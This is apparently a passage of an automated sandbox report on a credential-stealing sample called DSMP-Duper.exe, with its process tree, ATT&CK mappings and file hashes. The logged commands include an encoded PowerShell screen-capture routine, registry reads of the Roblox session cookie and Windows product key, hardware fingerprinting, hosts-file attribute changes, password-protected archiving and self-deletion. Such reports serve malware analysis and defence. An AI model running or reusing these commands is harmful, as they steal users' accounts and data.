QB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1372 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mm2ujnj4\mm2ujnj4.cmdline"5⤵PID:1096
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3C2.tmp" "c:\Users\Admin\AppData\Local\Temp\mm2ujnj4\CSCB118573A1BD4473CADE9E2E361CC3450.TMP"6⤵PID:5464
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3848
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:6108
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4900
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4752
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5744
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1276
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2040
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1164
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:5148
-
C:\Windows\system32\getmac.exegetmac4⤵PID:4948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\SMD4R.zip" *"3⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\_MEI16442\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI16442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\SMD4R.zip" *4⤵
- Executes dropped EXE
PID:5480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3848
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:908
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:632
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:5160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2152
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1840 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5744
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4908
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2196 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9afd9dcf8,0x7ff9afd9dd04,0x7ff9afd9dd102⤵PID:464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1852,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=1848 /prefetch:22⤵PID:1052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1588,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2088 /prefetch:32⤵PID:5948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2252,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2248 /prefetch:82⤵PID:556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:6032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3236,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4420,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4476 /prefetch:22⤵PID:3604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4716,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4732 /prefetch:12⤵PID:4736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5428 /prefetch:82⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5612 /prefetch:82⤵PID:5704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5428,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5476 /prefetch:82⤵PID:5960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5628,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5740 /prefetch:82⤵PID:6072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5732,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5672 /prefetch:82⤵PID:1164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4592,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4332 /prefetch:12⤵PID:2176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4512,i,16560375276149853641,15275811518668193424,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:2548
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5892
Network
MITRE ATT&CK Enterprise v16
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
414B
MD57f7a5e8cb3b79f4cab2917688d2e950b
SHA1bcc6940de00eeafe7de52cfaab54ddfae3215c3b
SHA256f7caf8135a31671694d140b5ee8056f29fb2a774141281d974a5a07acd5087a3
SHA512ff0a0add7bd95e433735baa06e7912331e3b8e25f55f35957ae0a021004b76659a71e56b093fd0bb9dad29b20c4dc4bd8b92cc5a52b209a2e7accc9f9b47958b
-
Filesize
216KB
MD550a7159ff34dea151d624f07e6cb1664
SHA1e13fe30db96dcee328efda5cc78757b6e5b9339c
SHA256e990d9d31c4c7d57dd4795e43baea05501fb6ea8b7760f89001be660425dd01b
SHA512a7768dd7e315b07754a305080e0fc023765e5a224b2c3824e8e10f29286df63bbdefef379e069941fd8cd9c7c3befce976779ae2efdfb6e7da697b09d7f07250
-
Filesize
2KB
MD5da69fa7014da8905ecdc30918a0c3ac5
SHA1bcaa6a8082539cdd6bcd109966780890236edd46
SHA256600d654abb8741cfebedb7f00fbeee56ced097928bf988a478c72f385b3ce8a9
SHA51251581db197a0d010ce26957389a976c349000e8ba657aeb26e2732a58f184d3b012f2554f4a86e42f15b1aec9012897e0f151f46badd4a43aa5793baef62ea7f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
11KB
MD5d2c6a51f013bc41b50bfa48dfd0fa113
SHA14f793f3bff0c7b5a1e0af3c34de6239c7281c10d
SHA25697e86b05db5fa1dd7cd8c278c20b88d35b77ac46dbc6ece72942990f3b398f4d
SHA51202b3742631ca3628abfe55fd01d4dc297ecb97d04aa48f5ec7b438fc33c7282093b51cc3258301a9e3de0ef19a3e4537660dd6c4608ec49553659890dadfdd0b
-
Filesize
11KB
MD5495b443cc893ce33a7d1270d1e3b0781
SHA140454363c4662bb6be439f0971cfe871e9cc3939
SHA2569ec6d0d7da00d8fe6de18bb31cfdba398c7d3e9b7032191b15e1cc12aa284372
SHA512cbb2e273739092a938ce24bbffba14d3494b7c714e4deda3b11622e50eb33609af364470dc43afaf9edbb7b0feafd5b1b6f7a5da528e6ce9026c374f86ed8a83
-
Filesize
10KB
MD52996e60ac0ee46a83e2e08ad14be407b
SHA1a5b4d9bc98bd1dbf169a6b0e7c66e91209b959bd
SHA256ece19d6b11b61a29240ec7dfac81973ab9d3a936d765cd646bfd11db8aa07502
SHA512d79d53758116e728222aece760748bc24f3985b1e40c6d91de5ef660c2f0698b5ff24ec4ec665396e46bedc5ddf7406747a93e2803e46b55507d32e68a9e48e1
-
Filesize
10KB
MD53ab4d749b38e06a026d04876f335de64
SHA135c55351d39a38f3f6833af563ba534093d93d78
SHA256842e9a7f88dd8160ca83c642c8e920b39bc6b9e775ad2a8dd85c71f741dc2423
SHA512dc7d01497d50949001e350c5ea08ed5221a11223e6900a0c9c5e0c68eca6be14053a19a89d196c86f8ab1a9f9d20e4843e7780d8afc4b0e6d842f0411eff0c0c
-
Filesize
15KB
MD513d66a0e0ce01c1c81f21dc3a37d0b4e
SHA1a05f9a5a017f7920b10897be60a9115c5ab90ebf
SHA25684f2391f3079acb089624d11d00dd4457eb7bd3b43f89069491055b192102a53
SHA512019069fd62813a41b3af5d6987a2cae89e515745595825705d88388fc025b616c504d5654a60716eff3eb1adedd9fb7f72462c1aa9de27777a77e3ceb76c1960
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
Filesize72B
MD52304fefebad0e252319242833c447441
SHA109c99b06a767029e6a844b0bd06ece6147f4f3fb
SHA256acdd199c96a6df43e7be40ac3f9e33a64b3bc1f53e1a48f8bbb2f0d63c2c2470
